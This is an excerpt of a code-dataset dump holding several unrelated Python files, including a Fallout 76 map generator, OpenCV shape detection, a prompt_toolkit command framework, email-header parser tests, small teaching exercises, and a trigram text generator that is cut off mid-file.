Winding Path\" ],\n [ 0x005D, 113, \"Top of the World\" ],\n [ 0x005E, 370, \"dam\",\n \"96,344\", \"166,388\", \"228,344\",\n \"236,344\", \"304,388\", \"372,344\" ],\n [ 0x005F, 255, \"Pylon V-13\" ],\n [ 0x0060, 79, \"The Whitespring\" ],\n [ 0x0061, 239, \"Nuka-Cola plant\" ],\n [ 0x0063, 164, \"The Crater\" ],\n [ 0x0064, 337, \"Foundation\" ],\n [ 0x0065, 374, \"Mothman Cult\", \"176,192\" ],\n [ 0x0066, 406, \"Blood Eagles\" ],\n [ 0x0067, 91, \"Vault 79\" ],\n [ 0x0069, 285, \"The Rusty Pick\", \"192,192\", \"320,192\" ],\n [ 0x006A, 97, \"Vault 51\" ] ]\n\ndef runSWFTool(args):\n if \"win\" in sys.platform:\n fullPath = \"C:/\" + swfToolsPath\n runCmd([fullPath + \"/\" + args[0]] + args[1:])\n else:\n fullPath = os.environ[\"HOME\"] + \"/.wine/drive_c/\" + swfToolsPath\n runCmd([winePath, fullPath + \"/\" + args[0]] + args[1:])\n\ndef removeFile(fileName):\n try:\n os.remove(fileName)\n except:\n pass\n\nif enableMarkers:\n if not noExtractIcons:\n runCmd([baunpackPath, fo76Path + \"/SeventySix - Interface.ba2\", \"--\",\n \"mapmarkerlibrary.swf\", \"mapmenu.swf\"])\n markerDefFile = open(markerDefFileName, \"w\")\n for i in iconList:\n iconFileName = \"interface/fo76icon_%02x.dds\" % (i[0])\n n = i[0]\n if n == 0x001E: # workshop\n swfName = \"interface/mapmarkerlibrary.swf\"\n else:\n swfName = \"interface/mapmenu.swf\"\n markerDefFile.write(\"0x%08X\\t0x%04X\\t%s\\t%g\\t7\\t// %s\\n\" % (\n 0x10, n, iconFileName, mipLevel + 0.5,\n i[2]))\n if noExtractIcons:\n continue\n runSWFTool([\"swfextract.exe\", \"-i\", i[1], swfName])\n runSWFTool([\"swfbbox.exe\", \"-e\", \"output.swf\"])\n runSWFTool([\"swfrender.exe\", \"-o\", \"output.png\", \"output.swf\"])\n removeFile(\"output.swf\")\n convertOptions = [\"-gravity\", \"center\", \"-background\", \"transparent\"]\n for j in range(3, len(i)):\n if j == 3:\n convertOptions += [\"-fill\", \"black\", \"-fuzz\", \"49%\"]\n convertOptions += [\"-draw\", \"color \" + i[j] + \" floodfill\"]\n convertOptions += [\"-filter\", \"Mitchell\"]\n if i[0] == 0x0042: # fissure site\n convertOptions += [\"-modulate\", \"100,200,3\"]\n convertOptions += [\"-resize\", \"35x35%\", \"-extent\", \"256x256\"]\n convertOptions += [\"DDS:\" + iconFileName]\n runCmd([imageMagickPath, \"convert\", \"output.png\"] + convertOptions)\n removeFile(\"output.png\")\n for i in additionalMarkerDefs:\n markerDefFile.write(\"0x%08X\\t%d\\t%s\\t%g\\t%d\\n\" % (\n (i[0], i[1], str(i[2]), mipLevel + i[3],\n i[4] + 7)))\n markerDefFile.close()\n\ndef createMap(gameName, gamePath, btdName, esmName, worldID, defTxtID):\n if not noExtractTextures:\n archiveList = findArchives(gamePath, \"textures\")\n runCmd([\"baunpack\"] + archiveList + [\"--\", \"@ltex/%s.txt\" % (gameName)])\n if not noExtractTerrain:\n args1 = [\"btddump\", gamePath + \"/Terrain/\" + btdName]\n args2 = cellRange + [mipLevel]\n runCmd(args1 + [gameName + \"hmap.dds\", \"0\"] + args2)\n runCmd(args1 + [gameName + \"ltex.dds\", \"2\"] + args2)\n if enableGCVR:\n runCmd(args1 + [gameName + \"gcvr.dds\", \"4\"] + args2)\n runCmd([\"findwater\", gamePath + \"/\" + esmName, gameName + \"wmap.dds\",\n gameName + \"hmap.dds\", worldID])\n landtxtOptions = [gameName + \"ltex.dds\", gameName + \"ltx2.dds\"]\n landtxtOptions += [\"ltex/\" + gameName + \".txt\"]\n landtxtOptions += [\"-mip\", mipLevel + textureMip]\n landtxtOptions += [\"-mult\", textureBrightness]\n if enableGCVR:\n landtxtOptions += [\"-gcvr\", gameName + \"gcvr.dds\"]\n runCmd([\"landtxt\"] + landtxtOptions)\n terrainOptions = [gameName + 
\"hmap.dds\", gameName + \"_map.dds\"]\n w = (cellRange[2] + 1 - cellRange[0]) << (7 - mipLevel)\n h = (cellRange[3] + 1 - cellRange[1]) << (7 - mipLevel)\n if enableIsometric:\n xyOffs = -(256 >> mipLevel)\n terrainOptions += [(w * 3) >> 1, (h * 15) >> 4, \"-iso\"]\n terrainOptions += [\"-xoffs\", xyOffs, \"-yoffs\", xyOffs]\n else:\n terrainOptions += [w, h, \"-2d\"]\n if enableTexture:\n terrainOptions += [\"-ltex\", gameName + \"ltx2.dds\"]\n terrainOptions += [\"-wmap\", gameName + \"wmap.dds\"]\n terrainOptions += [\"-lod\", \"0\", \"-watercolor\", waterColor]\n terrainOptions += [\"-light\", terrainBrightness, \"100\", \"35\"]\n runCmd([\"terrain\"] + terrainOptions)\n if enableMarkers:\n runCmd([\"markers\", gamePath + \"/\" + esmName, gameName + \"mmap.dds\",\n gameName + \"hmap.dds\", markerDefFileName])\n compositeOptions = [\"composite\", \"-dissolve\", markerAlpha]\n compositeOptions += [gameName + \"mmap.dds\", gameName + \"_map.dds\"]\n else:\n compositeOptions = [\"convert\", gameName + \"_map.dds\"]\n if resizeOutput and resizeOutput != \"100x100%\":\n compositeOptions += [\"-filter\", \"Lanczos\", \"-resize\", resizeOutput]\n compositeOptions += [\"-interlace\", \"Plane\", \"-sampling-factor\", \"1x1\"]\n compositeOptions += [\"-quality\", jpegQuality]\n compositeOptions += [\"JPEG:\" + gameName + \"_map.jpg\"]\n runCmd([imageMagickPath] + compositeOptions)\n\ncreateMap(\"fo76\", fo76Path, \"Appalachia.btd\", \"SeventySix.esm\", 0x0025DA15, 0)\n\n","sub_path":"makemap76.py","file_name":"makemap76.py","file_ext":"py","file_size_in_byte":11502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"523362509","text":"#---------------------------\n#Creator: Brittany Manuel\n#Created: September 23, 2014\n#Revisions: September 30, 2014\n#File: lightsOn_5.1.py\n#Assignment: 5.1\n#---------------------------\n\n\n\n#Import time, random, sys, set resursive stack to a larger amount.\n\n\n\nimport time \nfrom random import * \nimport sys \nsys.setrecursionlimit(100000)\n\n\n\n#---------------------------\n#Original setNewElement\n#---------------------------\n\ndef run_generations(L):\n\n\t#runGenerations keeps running evolve...\n\t#Display list, pause, evolve L into one new L, recurse\n\n\ttime.sleep(0.25)\n\tprint (L)\n\n\tif not all_ones(L):\n\t\tnewL = evolve(L) \n\t\treturn 1 + run_generations(newL)\n\n\n\telse:\n\t\tprint (\"Done\")\n\t\treturn 0\n\t\t\n\n\n#---------------------------\n#Original setNewElement\n#---------------------------\n\ndef evolve(L):\n\t\n\t#evolve takes in a list of integers, L, and returns a new list of integers considered to be the \"next generation\"\n\t#N holds the size of the list, L\n\t\n\tN = len(L) \n\treturn[set_new_element(L, i) for i in range(N)]\n\n\n\n#---------------------------\n#Question 4 -- Random\n#---------------------------\n\ndef set_new_element(L, i, x = 0):\n\n\t#SetNewElement returns the NEW list's ith element \n\t#input L: any list of integers \n\t#input i: the index of the new element to return \n\t#input x: an extra,optional input for future use\n\t\n\treturn choice([0,1])\n\n\n\n#---------------------------\n#Check for all 1's and counter\n#---------------------------\n\ndef all_ones(L):\n\n\t# print (\"Checking for all ones\")\n\t# print (L)\n\t# print ()\n\n\tones = [element == 1 for element in L]\n\n\treturn len(L) == sum(ones)\n\n\n\n\n\nprint (run_generations([0, 0, 1]))\n","sub_path":"05_Lights 
On/5.1/lightsOn_5.1.py","file_name":"lightsOn_5.1.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"149689261","text":"# USAGE\n# python detect_shapes.py --image shapes_and_colors.png\n\n# import the necessary packages\nfrom pyimagesearch.shapedetector import ShapeDetector\nimport argparse\nimport imutils\nimport cv2\nimport numpy as np\nimport copy\nimport math\n\ndef cal_contour_point_val(contours):\n return contours[0][0]+contours[0][1]*800\n\n\ndef find_border_angel(mid_point, image, direction='horizon', reverse_flag=0):\n kernel = [255, 255, 255, 255, 255]\n bias = 100\n image_shape = np.shape(image)\n degree = 0\n if direction == 'horizon':\n bias = min(image_shape[1] - mid_point[0] - int(len(kernel)/2), mid_point[0] - int(len(kernel)/2),\n bias + int(len(kernel)/2))\n if reverse_flag == 0:\n search_range = range(image_shape[0])\n else:\n search_range = reversed(range(image_shape[0]))\n a_point_y = -1\n b_point_y = -1\n for i in search_range:\n a_tmp = np.dot(image[i, mid_point[0] - bias - 2:mid_point[0] - bias + 3], kernel)\n b_tmp = np.dot(image[i, mid_point[0] + bias - 2:mid_point[0] + bias + 3], kernel)\n if a_tmp >= 130050:\n a_point_y = i\n if b_tmp >= 130050:\n b_point_y = i\n if a_point_y != -1 and b_point_y != -1:\n break\n print(\"{} - {}\".format(b_point_y, a_point_y))\n if a_point_y != -1 and b_point_y != -1:\n degree = math.degrees(math.atan2(b_point_y - a_point_y, 2 * bias))\n mid_point[1] = round(math.tan(math.radians(degree))*bias) + a_point_y\n\n elif direction == 'vertical':\n bias = min(image_shape[0] - mid_point[1] - int(len(kernel)/2), mid_point[1] - int(len(kernel)/2),\n bias + int(len(kernel)/2))\n if reverse_flag == 0:\n search_range = range(image_shape[1])\n else:\n search_range = reversed(range(image_shape[1]))\n a_point_x = -1\n b_point_x = -1\n for i in search_range:\n a_tmp = np.dot(image[mid_point[1] - bias - 2:mid_point[1] - bias + 3, i], kernel)\n b_tmp = np.dot(image[mid_point[1] + bias - 2:mid_point[1] + bias + 3, i], kernel)\n if a_tmp >= 130050:\n a_point_x = i\n if b_tmp >= 130050:\n b_point_x = i\n if a_point_x != -1 and b_point_x != -1:\n break\n print(\"{} - {}\".format(b_point_x, a_point_x))\n if a_point_x != -1 and b_point_x != -1:\n degree = 0 - math.degrees(math.atan2(b_point_x - a_point_x, 2 * bias)) #same degree\n mid_point[0] = round(math.tan(math.radians(degree))*bias) + a_point_x\n else:\n print(\"Error!\")\n #print(\"({}, {})\".format(mid_point[0], mid_point[1]))\n return degree\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True,\n help=\"path to the input image\")\nargs = vars(ap.parse_args())\n\n# load the image and resize it to a smaller factor so that\n# the shapes can be approximated better\nimage = cv2.imread(args[\"image\"])\nresized = imutils.resize(image, width=800)\nratio = image.shape[0] / float(resized.shape[0])\n\n# convert the resized image to grayscale, blur it slightly,\n# and threshold it\ngray = cv2.cvtColor(resized, cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray, (5, 5), 0)\n'''\na = np.shape(blurred)\ncent_x, cent_y = int(a[1]/2), int(a[0]/2)\nfor i in range(cent_y):\n print(\"{}: {}\".format(i, blurred[i][cent_x]))\nthresh = cv2.threshold(blurred, 90, 255, cv2.THRESH_BINARY)[1]\n'''\ncanny_rst = cv2.Canny(blurred, 50, 150, L2gradient=True)\ncv2.imshow(\"Test\", canny_rst)\ncv2.waitKey(0)\ncnts = 
cv2.findContours(canny_rst.copy(), cv2.RETR_EXTERNAL,\n\tcv2.CHAIN_APPROX_SIMPLE)\ncnts = cnts[0] if imutils.is_cv2() else cnts[1]\nc = max(cnts, key=cv2.contourArea)\nc = np.array(np.array(c).astype(float)*ratio).astype(int)\n# determine the most extreme points along the contour\nextLeft = tuple(c[c[:, :, 0].argmin()][0])\nextRight = tuple(c[c[:, :, 0].argmax()][0])\nextTop = tuple(c[c[:, :, 1].argmin()][0])\nextBot = tuple(c[c[:, :, 1].argmax()][0])\n\n# draw the outline of the object, then draw each of the\n# extreme points, where the left-most is red, right-most\n# is green, top-most is blue, and bottom-most is teal\ncv2.drawContours(image, [c], -1, (0, 255, 255), 2)\ncv2.circle(image, extLeft, 6, (0, 0, 255), -1)\ncv2.circle(image, extRight, 6, (0, 255, 0), -1)\ncv2.circle(image, extTop, 6, (255, 0, 0), -1)\ncv2.circle(image, extBot, 6, (255, 255, 0), -1)\n\nresize_img = imutils.resize(image, width=800)\n# show the output image\ncv2.imshow(\"Image\", resize_img)\ncv2.waitKey(0)\n","sub_path":"shape-detection/detect_shapes_bk.py","file_name":"detect_shapes_bk.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"141728884","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport tableprint\n\nfrom abc import ABCMeta\nfrom prompt_toolkit import PromptSession, print_formatted_text, HTML\nfrom prompt_toolkit.auto_suggest import AutoSuggestFromHistory\nfrom prompt_toolkit.history import FileHistory\nfrom prompt_toolkit.completion import Completion\n\n\ndef entrypoint(alias=None, doc=\"\", complete=None, base=False):\n \"\"\"Decorate one method as a command entrypoint. like:\n\n @entrypoint()\n def help(self):\n pass\n\n :param alias: give one entrypoint multi command name\n :param doc: the command description\n :return: method\n \"\"\"\n alias = [] if alias is None else alias\n\n def wrap(method):\n \"\"\"\n :param method: decorated method of topic class\n :return:\n \"\"\"\n name = method.__name__\n if name not in alias:\n alias.insert(0, name)\n\n method._entrypoint = True\n method._flags = alias\n method._doc = doc\n method.complete = complete\n method._base = base\n return method\n return wrap\n\n\nclass TopicMeta(ABCMeta):\n\n # all topic class\n # eg: {\"\": DefaultTopic, \"other\": OtherTopic}\n topic_classes = {}\n\n # topic entrypoint per topic\n # eg: {'': {'select_topic': }}\n topic_entrypoints = {}\n\n def __init__(self, name, bases, members):\n super(TopicMeta, self).__init__(name, bases, members)\n mcls = self.__class__\n\n mcls.topic_classes[self._name] = self\n mcls.topic_entrypoints[self._name] = {}\n\n for attr, method in members.items():\n if not getattr(method, \"_entrypoint\", False):\n continue\n mcls.topic_entrypoints[self._name].update(dict.fromkeys(method._flags, method))\n\n for base in bases:\n if not isinstance(base, mcls):\n continue\n mcls.topic_entrypoints[self._name].update(mcls.topic_entrypoints[base._name])\n\n @classmethod\n def create_topic(mcls, name, context):\n \"\"\"create a topic instance\n\n :param mcls: TopicMeta\n :param name: topic name\n :param context: `easier.Context` object\n :return: topic object\n \"\"\"\n if name not in mcls.topic_classes:\n return None\n topic = mcls.topic_classes[name](context)\n return topic\n\n\nclass Topic(object, metaclass=TopicMeta):\n\n _name = None\n\n def __init__(self, context):\n self.context = context\n self.session = PromptSession(\"%s> \" % self.name,\n history=FileHistory(self._history_filename()),\n 
auto_suggest=AutoSuggestFromHistory())\n\n def release(self):\n \"\"\"relase resource and reference\n \"\"\"\n self.context = None\n self.session = None\n\n def _history_filename(self):\n filename = '.history/{}'.format(self._name)\n dirname = os.path.dirname(filename)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n return filename\n\n def get_entrypoint(self, cmd):\n \"\"\"find entrypoint by command name\n\n :param cmd: command\n :return: entrypoint function object\n \"\"\"\n return TopicMeta.topic_entrypoints.get(self._name, {}).get(cmd, None)\n\n def get_entrypoints(self):\n \"\"\"return all entrypoint in this topic\n\n :return: all entrypoint data\n \"\"\"\n return TopicMeta.topic_entrypoints.get(self._name, {})\n\n @staticmethod\n def _get_topics():\n \"\"\"return all topic name\n \"\"\"\n return {name: obj for name, obj in TopicMeta.topic_classes.items() if bool(name)}\n\n def execute_command(self, cmd, content):\n \"\"\"determine entrypoint funcion, and call it.\n\n :param cmd: command name, also is entrypoint function name\n :param content: command content, also is entrypoint function arguments\n \"\"\"\n func = self.get_entrypoint(cmd)\n if not func:\n self.command_not_found(cmd)\n return\n\n args = [content] if content else []\n\n try:\n func(self, *args)\n except TypeError as e:\n print(e)\n self.lack_command_options(cmd)\n\n @staticmethod\n def command_not_found(cmd):\n print_formatted_text(HTML('invalid command, type \"help\" for more information'))\n\n @staticmethod\n def lack_command_options(cmd):\n print_formatted_text(HTML('command option error'))\n\n @staticmethod\n def topic_not_found(name):\n print_formatted_text(\n HTML('topic \"{}\" not found, type \"list_topics\" for more information'.format(name)))\n\n @property\n def name(self):\n \"\"\"the topic's name, it's a class attribute\n \"\"\"\n return self._name\n\n def _topic_completions(self, content):\n \"\"\" auto complete when typing topic\n\n :param content: command content\n :return:\n \"\"\"\n\n commands = self._get_topics()\n for name, _ in commands.items():\n if content and not name.startswith(content):\n continue\n yield Completion(\n name,\n start_position=-len(content),\n style='bg:seagreen'\n )\n\n @entrypoint(\n doc=\"change topic, eg: > 'select_topic plan'\",\n complete=\"_topic_completions\",\n base=True,\n )\n def select_topic(self, name):\n \"\"\"change topic\n\n :param name: topic name\n :return:\n \"\"\"\n topic = self.context.get_topic(name)\n if not topic:\n self.topic_not_found(name)\n return\n self.context.set_current(topic)\n\n @entrypoint(doc=\"show all topic\", base=True)\n def list_topic(self):\n \"\"\"show topic list\n \"\"\"\n rows = []\n header = (\"topic\", \"description\")\n mx_topic_size = len(header[0])\n mx_desc_size = len(header[1])\n\n for topic, tcls in self._get_topics().items():\n mx_topic_size = max(mx_topic_size, len(topic))\n mx_desc_size = max(mx_desc_size, len(tcls._description))\n rows.append((topic, tcls._description))\n\n rows.sort(key=lambda k: \"z\" if k[0] in [\"default\"] else k[0])\n tableprint.table(rows, (\"topic\", \"description\"), width=(mx_topic_size + 5, mx_desc_size + 5), style=\"clean\")\n\n @entrypoint(alias=[\"quit\"], doc=\"quit program\", base=True)\n def exit(self, *args):\n raise EOFError\n\n @entrypoint(doc=\"clear screen\", base=True)\n def clear(self):\n \"\"\"clear screen\n \"\"\"\n os.system(\"clear\")\n\n @entrypoint(doc=\"show all available commands\", base=True)\n def help(self):\n header = (\"command\", \"description\")\n mx_cmd_size 
= len(header[0])\n mx_desc_size = len(header[1])\n bases = []\n bizs = []\n\n for name, obj in self.get_entrypoints().items():\n mx_cmd_size = max(mx_cmd_size, len(name))\n mx_desc_size = max(mx_desc_size, len(obj._doc))\n if obj._base:\n bases.append((name, obj._doc))\n else:\n bizs.append((name, obj._doc))\n\n if bizs:\n bizs.sort()\n print_formatted_text(\"\\nbiz commands:\")\n tableprint.table(bizs, header, width=(mx_cmd_size + 5, mx_desc_size + 5), style='grid')\n\n if bases:\n print_formatted_text(\"\\ncommon commands:\")\n bases.sort()\n tableprint.table(bases, header, width=(mx_cmd_size + 5, mx_desc_size + 5), style='grid')\n\n def print_success(self):\n print_formatted_text(\"\")\n print_formatted_text(HTML('SUCCESS!'))\n\n def print_fail(self):\n print_formatted_text(\"\")\n print_formatted_text((HTML('ERROR!')))\n\n\nclass DefaultTopic(Topic):\n\n _name = \"default\"\n _description = \"默认\"\n","sub_path":"easier/topic/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"116972538","text":"from src.const import BCC_KEY\nfrom src.const import CC_KEY\nfrom src.const import DATE_KEY\nfrom src.const import FROM_KEY\nfrom src.const import REPLY_KEY\nfrom src.const import SUBJECT_KEY\nfrom src.const import TO_KEY\nfrom src.crawler import process_date_line\nfrom src.crawler import process_email_line\nfrom src.crawler import process_line\nfrom src.crawler import process_subject_line\n\n\nclass TestProcessEmailLine(object):\n \"\"\"\n Testing line processing function\n \"\"\"\n\n def test_no_recipient_provided(self):\n input_line = 'To: '\n expected = {'TO': []}\n assert expected == process_email_line(input_line, TO_KEY, header='To:')\n assert expected == process_line(input_line)\n\n def test_multiple_recipients_provided(self):\n input_line = (\n 'To: mary.hain@enron.com, '\n 'james.steffes@enron.com, '\n 'joe.hartsoe@enron.com,'\n )\n expected = {\n TO_KEY: [\n 'mary.hain@enron.com',\n 'james.steffes@enron.com',\n 'joe.hartsoe@enron.com',\n ]\n }\n assert expected == process_email_line(\n input_line, TO_KEY, header='To:'\n )\n assert expected == process_line(input_line)\n\n def test_from_input_line(self):\n input_line = 'From: jeff.dasovich@enron.com'\n expected = {\n FROM_KEY: 'jeff.dasovich@enron.com'\n }\n assert expected == process_email_line(\n input_line, FROM_KEY, header='From:'\n )\n assert expected == process_line(input_line)\n\n def test_from_none_line(self):\n input_line = 'From: '\n expected = {FROM_KEY: None}\n assert expected == process_email_line(\n input_line, FROM_KEY, header='From:'\n )\n assert expected == process_line(input_line)\n\n def test_repeating_input_line(self):\n input_line = 'To: \"Steven.J.Kean@enron.com\" '\n expected = {\n TO_KEY: ['Steven.J.Kean@enron.com']\n }\n assert expected == process_email_line(\n input_line, TO_KEY, header='To:'\n )\n assert expected == process_line(input_line)\n\n def test_problematically_formatted_email(self):\n input_line = 'To: pr <.palmer@enron.com>'\n expected = {\n TO_KEY: ['palmer@enron.com']\n }\n assert expected == process_email_line(\n input_line, TO_KEY, header='To:'\n )\n assert expected == process_line(input_line)\n\n def test_cc_line(self):\n input_line = (\n 'Cc: chris.long@enron.com, '\n 'pat.shortridge@enron.com, '\n 'stephen.burns@enron.com,'\n )\n expected = {\n CC_KEY: [\n 'chris.long@enron.com',\n 'pat.shortridge@enron.com',\n 'stephen.burns@enron.com',\n ]\n }\n assert expected == 
process_email_line(\n input_line, CC_KEY, header='Cc:'\n )\n assert expected == process_line(input_line)\n\n def test_bcc_line(self):\n input_line = 'Bcc: chris.long@enron.com, pat.shortridge@enron.com,'\n expected = {\n BCC_KEY: [\n 'chris.long@enron.com',\n 'pat.shortridge@enron.com',\n ]\n }\n assert expected == process_email_line(\n input_line, BCC_KEY, header='Bcc:'\n )\n assert expected == process_line(input_line)\n\n\nclass TestParseTimeLine(object):\n \"\"\"\n Test to parse date from email line converting date\n \"\"\"\n\n def test_basic_input(self):\n input_line = 'Date: Fri, 15 Sep 2000 06:19:00 -0700 (PDT)'\n expected = {\n DATE_KEY: '2000-09-15T06:19:00-07:00'\n }\n assert expected == process_date_line(input_line)\n assert expected == process_line(input_line)\n\n def test_input_no_text_timezone_provided(self):\n input_line = 'Date: Fri, 15 Sep 2000 06:19:00 -0700 '\n expected = {\n DATE_KEY: '2000-09-15T06:19:00-07:00'\n }\n assert expected == process_date_line(input_line)\n assert expected == process_line(input_line)\n\n def test_parse_improperly_formatted_line(self):\n input_line = 'Date: Fr, 1 S 20 06: 0700 '\n expected = {\n DATE_KEY: None\n }\n assert expected == process_date_line(input_line)\n assert expected == process_line(input_line)\n\n\nclass TestParseSubjectLine(object):\n \"\"\"\n Test parsing subject line\n \"\"\"\n\n def test_basic_input(self):\n input_line = 'Subject: Skilling\\'s office'\n expected = {\n SUBJECT_KEY: 'Skilling\\'s office',\n REPLY_KEY: False,\n }\n assert expected == process_subject_line(input_line)\n assert expected == process_line(input_line)\n\n def test_reply_input(self):\n input_line = 'Subject: Re: CPUC Request for Confidential Information'\n expected = {\n SUBJECT_KEY: 'CPUC Request for Confidential Information',\n REPLY_KEY: True,\n }\n assert expected == process_subject_line(input_line)\n assert expected == process_line(input_line)\n\n\nclass TestParseMultiLineTo(object):\n \"\"\"\n Test parsing to line without heading\n \"\"\"\n\n def test_second_to_line(self):\n input_line = '\tsusan.mara@enron.com, sarah.novosel@enron.com'\n expected = {\n TO_KEY: ['susan.mara@enron.com', 'sarah.novosel@enron.com']\n }\n assert expected == process_line(input_line, last_key=TO_KEY)\n","sub_path":"test/test_crawler.py","file_name":"test_crawler.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"482921000","text":"# Formatting Time and Date Output\n# ===============================\n\nfrom datetime import datetime\nfrom string import ascii_lowercase as letters\nimport pandas as pd\n\nnow = datetime.now()\n\n\ndef fdate(letter):\n try:\n return now.strftime('%' + letter)\n except ValueError:\n return '-'\n\n\ndef main():\n # Times and dates can be formatted using a set of predefined string control codes\n # Date Formatting\n\n # %y/%Y - Year, %a/%A - weekday, %b/%B - month, %d - day of month\n print('The date is', now.strftime('%A %d %B %Y'))\n\n # %I/%H - 12/24 Hour, %M - minute, %S - second, %p - locale's AM/PM\n print('The time is', now.strftime('%I:%M %p'))\n print('The time is', now.strftime('%H:%M'))\n\n # %c - locale's date and time, %x - locale's date, %X - locale's time\n print('The locale datetime is', now.strftime('%c'))\n print('The locale date is', now.strftime('%x'))\n print('The locale time is', now.strftime('%X'))\n\n df = pd.DataFrame({'letter': list(letters)})\n df['date'] = df['letter'].apply(fdate)\n df['DATE'] = 
df['letter'].apply(lambda x: x.upper()).apply(fdate)\n    df.set_index('letter', inplace=True)\n\n    df.loc[:, 'Comment'] = ''\n    df.loc['a', 'Comment'] = 'Weekday'\n    df.loc['b', 'Comment'] = 'Month Name'\n    df.loc['j', 'Comment'] = 'Days in the year'\n    df.loc['x', 'Comment'] = 'Locale'\n\n    print(df)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"Learning Python with Joe Marini/Ch3/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"400942653","text":"'''Load the username if it was stored previously;\notherwise, ask the user to provide a name.\n'''\nimport json\n\n\ndef get_stored_username():\n    '''Get the username if it is available.'''\n\n    filename = 'username.json'\n    try:\n        with open(filename) as user_obj:\n            username = json.load(user_obj)  # load the json\n\n    except FileNotFoundError:  # if the file is not found, return None\n        return None\n    else:\n        return username  # if found, return the name\n\n\ndef get_new_username():\n    username = input('What is your name: ')\n    filename = 'username.json'\n    with open(filename, 'w') as user_obj:\n        json.dump(username, user_obj)\n    return username\n\n\ndef greet_user():\n    '''Greet the user.'''\n    username = get_stored_username()\n    if username:\n        answer = input('Is your name correct? (y/n) ')\n        if answer.lower() == 'y':\n            print('Welcome back, ' + username)  # name was stored, so print it\n        else:\n            username = get_new_username()\n            print('We will remember when you come back, ' + username)\n    else:\n        username = get_new_username()\n        print('We will remember when you come back, ' + username)\n\n\ngreet_user()\n","sub_path":"Cap.10/remember_me.py","file_name":"remember_me.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"174796093","text":"\ndef input_string():  # Input string and symbols to find\n    uString = input('Enter your string: ')\n    symbols = input('Enter symbols: ')\n    return uString, symbols\n\ndef solution(string, symbol):  # Solution of the task\n    result = []\n    for word in string.split():  # Check every word in string\n        end = len(word) - len(symbol)\n        if word[0:len(symbol)] == word[end:] and word[0:len(symbol)] == symbol:  # Conditions from the task\n            result.append(word)\n    return result\n\ndef output(array):  # Output the results\n    print('Words:', ' '.join(array))\n\nusersString, usersSymbol = input_string()\nprocessed = solution(usersString, usersSymbol)\noutput(processed)\n","sub_path":"Term1Prog/laba9.py","file_name":"laba9.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"323436400","text":"############\n# Trigrams #\n############\nimport os\nimport random\n\n\n# split the sentence into a words list\n#words = 'I wish I may I wish I might'.split()\n\n\n# build the trigrams dict from the list of words\ndef build_trigrams_dic(words):\n    trigrams_dic = {}\n    for i in range(len(words)-2):\n        ##############################################\n        # Note: Only hashable types can be keys of a dict;\n        # hashable types are: string, tuple, number\n        ##############################################\n        # get a pair of words and save it in a tuple\n        pairwords = tuple(words[i:i+2])\n        follower = words[i+2]  # get the following word\n        if pairwords in trigrams_dic:\n            trigrams_dic[pairwords].append(follower)\n        else:\n            trigrams_dic[pairwords]=[follower]\n    return trigrams_dic\n\ndef clean_up(line):\n    import string\n    import re\n    table = str.maketrans(dict.fromkeys(string.punctuation))\n    new_line = line.translate(table)\n\n    # found a Roman numeral at the beginning of a chapter\n    if re.search('^(XI{0,2}|IX|IV|I{2,3}|VI{0,3})$', new_line):\n        print(f\"found a Roman numeral {new_line}\")\n        return -1\n    if re.search('^End', new_line):\n        print(f\"The End of the book. {new_line}\")\n        return -2\n    return new_line\n\n\n#################\n# Main part\n#################\nif __name__ == \"__main__\":\n\n    ###########\n    # start to build the trigrams dictionary\n    ###########\n\n    # read in the txt file to build the trigrams dict\n    cur_dir = os.getcwd()\n    source = os.path.join(cur_dir, 'sherlock.txt')\n    word_list = []\n    start_flag = 0\n    # read in all the words from the file into word_list\n    with open(source,\"r\") as in_file:\n        # read in each line\n        for line in in_file:\n            line = line.rstrip(\"\\\\n\")\n\n            if len(line) == 0:\n                continue\n\n            if start_flag == 0:\n                w = line.split()\n                if len(w) == 1 and w[0] == 'I.': # the beginning of the book\n                    start_flag = 1\n                    #print(f\"-- Begin --\")\n                    continue\n            \"\"\"else:\n\n                w = line.split()\n                if w[0] == '***':# the End of the book\n                    #print(f\"-- End --\")\n                    break\n            \"\"\"\n            # skip the empty lines and the title part\n            if len(line)!=0 and start_flag == 1:\n                # clean up the unwanted punctuation before breaking it into words\n                #print(f\"-- old lines :{line}\")\n                line = clean_up(line)\n                if line == -1:\n                    continue\n                elif line == -2:\n                    break\n                else:\n                    # put all words of the file into a single words list\n                    for word in line.split():\n                        word_list.append(word)\n\n    #print(f\"--word list :{word_list}\")\n\n\n    # build the trigrams dict based on word_list\n    trigrams_dic = build_trigrams_dic(word_list)\n    # display the dictionary\n    #for key, val in trigrams_dic.items():\n    #    print(f\"{key} => {val}\")\n\n    ###########\n    # start to generate text by using the trigram dictionary\n    ###########\n    # generate a random index within the length of the dictionary\n    buildup_text = []\n    # 3.1 Picking a random key from the trigrams_dic\n    key_list = list(trigrams_dic.keys())\n    random_key = random.choice(key_list)\n\n\n    buildup_text=list(random_key)\n    print(f\"-- Random Start Key:{random_key} --\")\n    while random_key in trigrams_dic:\n        rand_num = random.randrange(len(trigrams_dic[random_key]))\n        third_word = trigrams_dic[random_key][rand_num]\n        three_words_list = list(random_key)\n        three_words_list.append(third_word)\n\n        # get the last two words as the new key\n        last_two_words = three_words_list[-2:]\n\n        # build the text 